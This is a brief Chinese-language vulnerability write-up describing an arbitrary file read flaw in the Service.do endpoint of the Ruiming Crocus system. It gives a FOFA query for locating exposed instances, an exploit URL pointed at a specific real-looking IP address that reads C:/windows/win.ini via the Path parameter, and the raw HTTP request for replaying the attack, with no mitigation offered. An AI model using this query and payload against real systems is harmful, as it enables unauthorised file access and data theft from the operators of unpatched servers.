漏洞挖掘---锐明Crocus系统Service.do接口任意文件读取
一、FOFA-Search...
body="inp_verification"
二、访问并抓包
#URL
http://110.52.91.154:8000/Service.do?Action=Download&Path=C:/windows/win.ini
三、发送到重放器构造
#构造
GET /Service.do?Action=Download&Path=C:/windows/win.ini HTTP/1.1
Host: ******
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
FROM IYU_